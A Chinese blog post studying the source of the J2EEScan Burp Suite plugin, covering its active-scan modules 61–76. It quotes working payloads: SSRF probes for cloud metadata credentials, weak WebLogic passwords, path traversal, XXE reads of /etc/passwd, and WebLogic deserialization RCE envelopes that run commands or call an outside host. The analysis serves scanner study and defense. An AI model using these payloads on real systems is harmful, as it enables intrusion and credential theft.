【BurpSuite】插件开发学习之J2EEScan(下)-主动扫描(61-70)
前言
插件开发学习第11套。前置文章:
【BurpSuite】插件开发学习之Log4shell
【BurpSuite】插件开发学习之Software Vulnerability Scanner
【BurpSuite】插件开发学习之dotnet-Beautifier
【BurpSuite】插件开发学习之active-scan-plus-plus
【BurpSuite】插件开发学习之J2EEScan(上)-被动扫描
【BurpSuite】插件开发学习之J2EEScan(下)-主动扫描(1-10)
【BurpSuite】插件开发学习之J2EEScan(下)-主动扫描(11-20)
【BurpSuite】插件开发学习之J2EEScan(下)-主动扫描(21-30)
【BurpSuite】插件开发学习之J2EEScan(下)-主动扫描(31-40)
【BurpSuite】插件开发学习之J2EEScan(下)-主动扫描(41-50)
【BurpSuite】插件开发学习之J2EEScan(下)-主动扫描(51-60)
分析
【61】SSRFScanner
地址:
private static final List<byte[]> SSRF_INJECTION_TESTS = Arrays.asList(
"gopher://localhost:22/".getBytes(),
"http://[::]:22/".getBytes(),
"ftp://[::]:22/".getBytes(),
"ftp://localhost:22/".getBytes(),
"ftp://0.0.0.0:22/".getBytes(),
"ftp://0177.0000.0000.0001:22".getBytes(),
"ftp://0x7f.1:22/".getBytes(),
"http://spoofed.burpcollaborator.net:22/".getBytes()
);
这是打本地的22端口
match就是
private static final byte[] GREP_STRING = "OpenSSH".getBytes();
然后就是访问云上各种元数据
private static final Map<byte[], Pattern> SSRF_CLOUD_INJECTION_TESTS = new HashMap<byte[], Pattern>() {
{
put("http://169.254.169.254/latest/meta-data/".getBytes(), Pattern.compile("identity-credentials", Pattern.CASE_INSENSITIVE | Pattern.DOTALL | Pattern.MULTILINE));
put("http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token".getBytes(), Pattern.compile("token_type", Pattern.CASE_INSENSITIVE | Pattern.DOTALL | Pattern.MULTILINE));
}
这里注释给出了一些情况
*
* Source AWS
* http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html
*
* http://169.254.169.254/latest/user-data
* http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLENAME]
* http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLENAME]
* http://169.254.169.254/latest/meta-data/ami-id
* http://169.254.169.254/latest/meta-data/reservation-id
* http://169.254.169.254/latest/meta-data/hostname
* http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
* http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key
*
* # AWS - Dirs http://169.254.169.254/
* http://169.254.169.254/latest/meta-data/
* http://169.254.169.254/latest/meta-data/public-keys/
*
互联网上也有很多总结
http://cn-sec.com/archives/840191.html
【62】StatusServlet
payload
private static final List<String> STATUS_SERVLET_PATHS = Arrays.asList(
"/status?full=true",
"/web-console/status?full=true",
"/server-status?full=true"
);
如果是401
if (statusInfo.getStatusCode() == 401) {
则认为是存在登录接口
然后就是弱口令测试
WeakPasswordBruteforcer br = new WeakPasswordBruteforcer();
如果match到了200且有如下返回,说明存在不同类型服务信息泄露
private static final byte[] GREP_STRING_J2EE = "Status Servlet".getBytes();
private static final byte[] GREP_STRING_HTTPD = "Apache Server Status".getBytes();
【63】TomcatHostManager
tomcat管理后台泄露,比较常见了
private static final List<String> TOMCAT_HOST_MANAGER_PATHS = Arrays.asList(
"/host-manager/html?j2eescan"
);
爆破
【64】TomcatManager
同63
private static final List<String> TOMCAT_MANAGER_PATHS = Arrays.asList(
"/manager/html"
);
【65】UndertowTraversal CVE-2014-7816
Jboss的问题
payload
private static final List<String> JBOSS_PATHS = Arrays.asList(
"/..\\\\standalone\\\\configuration\\\\standalone.xml"
);
match的是读取的xml
private static final List<byte[]> GREP_STRINGS = Arrays.asList(
"<server".getBytes()
);
【66】URINormalizationTomcat
未授权访问tomcat
private static final List<String> TOMCAT_URI_NORMALIZATIONS = Arrays.asList(
"..;/manager/html",
"..;/"
);
眼熟啊,shiro的未授权访问也是这么绕的
【67】UTF8ResponseSplitting
好像又是个crlf
payload
private static final byte[] INJ = "%E5%98%8A%E5%98%8DX-Injection:%20test".getBytes();
match返回包
if (getResponseHeaderValue(responseInfo, "X-Injection") != null) {
【68】WebInfInformationDisclosure
payload
private static final List<String> WEBINF_PATHS = Arrays.asList(
"/WEB-INF./web.xml",
"//WEB-INF/web.xml",
"/WEB-INF/web.xml",
"/static/WEB-INF/web.xml", // CVE-2014-0053
"/forward:/WEB-INF/web.xml", // spring issue
"/web-inf./web.xml", // CVE-2016-0793 https://bugzilla.redhat.com/show_bug.cgi?id=1305937
"/.//WEB-INF/web.xml",
"/./WEB-INF/web.xml"
);
match
private static final byte[] GREP_STRING = "<web-app".getBytes();
任意文件读取也可以多尝试此类文件。
【69】WeblogicConsole
登录接口path
private static final List<String> WEBLOGIC_CONSOLE_PATHS = Arrays.asList(
"/console/login/LoginForm.jsp;ADMINCONSOLESESSION=TynPs0LnRt9BLctc13WMYmhQpsp3cG1LCNDp78TJyDfHMWhC4Kln!1225542286"
);
match
private static final List<byte[]> GREP_WEBLOGIC_STRINGS = Arrays.asList(
"<TITLE>BEA WebLogic Server Administration Console".getBytes(),
"<title>Oracle WebLogic Server Administration Console".getBytes(),
"<TITLE>WebLogic Server".getBytes()
);
说明存在爆破的可能
然后开始爆破
List<Map.Entry<String, String>> credentials = new ArrayList<>();
credentials.add(new AbstractMap.SimpleEntry<>("weblogic", "weblogic"));
credentials.add(new AbstractMap.SimpleEntry<>("weblogic", "weblogic1"));
credentials.add(new AbstractMap.SimpleEntry<>("weblogic", "weblogic01"));
credentials.add(new AbstractMap.SimpleEntry<>("weblogic", "welcome1"));
比较粗糙,只尝试了4个弱口令和一个账号。
【70】Weblogic CVE-2019-2725
问题路径
private static final List<String> ASYNC_PATHS = Arrays.asList(
"/_async/AsyncResponseService"
);
payload
String serializedRce = "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:wsa=\"http://www.w3.org/2005/08/addressing\" xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\"> "
+ "<soapenv:Header>"
+ "<wsa:Action>ONRaJntRjNYBc3MJW2JC</wsa:Action>"
+ "<wsa:RelatesTo>42PlWZ15ODi1hQ3pQ5Ol</wsa:RelatesTo>"
+ "<work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">"
+ "<void class=\"java.lang.ProcessBuilder\">"
+ "<array class=\"java.lang.String\" length=\"3\">"
+ "<void index=\"0\">"
+ "<string>/bin/bash</string>"
+ "</void>"
+ "<void index=\"1\">"
+ "<string>-c</string>"
+ "</void>"
+ "<void index=\"2\">"
+ "<string>ping -c 3 %s</string>"
+ "</void>"
+ "</array>"
+ "<void method=\"start\"/></void>"
+ "</work:WorkContext>"
+ "</soapenv:Header>"
+ "<soapenv:Body>"
+ "<asy:onAsyncDelivery/>"
+ "</soapenv:Body></soapenv:Envelope>";
// Collaborator context
这是个RCE hw用的可能比较多
【71】Weblogic CVE-2017-10271
这个可以尝试的path就更多了
private static final List<String> WLS_WSAT_PATHS = Arrays.asList(
"/wls-wsat/CoordinatorPortType",
"/wls-wsat/CoordinatorPortType11",
"/wls-wsat/ParticipantPortType",
"/wls-wsat/ParticipantPortType11",
"/wls-wsat/RegistrationPortTypeRPC",
"/wls-wsat/RegistrationPortTypeRPC11",
"/wls-wsat/RegistrationRequesterPortType",
"/wls-wsat/RegistrationRequesterPortType11"
);
payload
String serializedRce = "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">"
+ "<soapenv:Header>"
+ "<work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">"
+ " <java version=\"1.8\" class=\"java.beans.XMLDecoder\">"
+ " <void id=\"url\" class=\"java.net.URL\">"
+ " <string>http://%s</string>"
+ " </void>"
+ " <void idref=\"url\">"
+ " <void id=\"stream\" method = \"openStream\" />"
+ " </void>"
+ " </java>"
+ "</work:WorkContext>"
+ "</soapenv:Header>"
+ "<soapenv:Body/>"
+ "</soapenv:Envelope>";
这也是RCE
【72】WeblogicUDDIExplorer CVE-2014-4210 ssrf
path
private static final List<String> UDDI_PATHS = Arrays.asList(
"/uddiexplorer/"
);
match到这些
private static final List<byte[]> GREP_SSRF_STRINGS = Arrays.asList(
"could not connect over HTTP to server:".getBytes(),
"XML_SoapException: Connection refused".getBytes(),
"XML_SoapException: Received a response from url".getBytes()
);
说明存在SSRF
比较粗的判断
实际还需要去发送特定的漏洞请求
【73】WeblogicWebServiceTestPage CVE-2018-2894
漏洞path
private static final List<String> WS_TEST_PAGES = Arrays.asList(
"/ws_utc/config.do"
);
match
private static final List<byte[]> GREP_STRINGS = Arrays.asList(
"<title>settings</title>".getBytes()
);
则存在漏洞
这是个任意文件上传的测试页面,不需要权限控制
【74】XInclude 任意文件上传
payload一把锁
private static final List<byte[]> XINCLUDE_INJ_TESTS = Arrays.asList(
"<xi:include href=\"file:///etc/passwd\" parse=\"text\"/>".getBytes());
【75】XXEModule
payload
private static final String XXE_DTD_DEFINITION = "<?xml version=\"1.0\"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM \"file:///etc/passwd\" >]>";
这是可回显的,看着像是通用性的一个插件
【76】XXEParameterModule
payload
private static final List<byte[]> XXE_INJECTION_TESTS = Arrays.asList(
"<?xml version=\"\"1.0\"\" encoding=\"\"ISO-8859-1\"\"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM \"\"file:etc/passwd\"\">]><foo>&xxe;</foo>".getBytes(),
// https://twitter.com/Agarri_FR/status/656440244116574208
"<![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM \"file:///etc/passwd\"> %dtd;]><xxx/>]]>".getBytes()
);
一样的
一个是打did一个是直接解析回显
match
private static final List<Pattern> XXE_RE_MATCHES = Arrays.asList(
Pattern.compile("root:.*:0:[01]:", Pattern.CASE_INSENSITIVE | Pattern.DOTALL | Pattern.MULTILINE),
Pattern.compile("file not found", Pattern.CASE_INSENSITIVE | Pattern.DOTALL | Pattern.MULTILINE),
Pattern.compile("java\\.io\\.FileNotFoundException", Pattern.CASE_INSENSITIVE | Pattern.DOTALL | Pattern.MULTILINE));
但通常打did不用file测试,用http协议会比较常见可以打DNSlog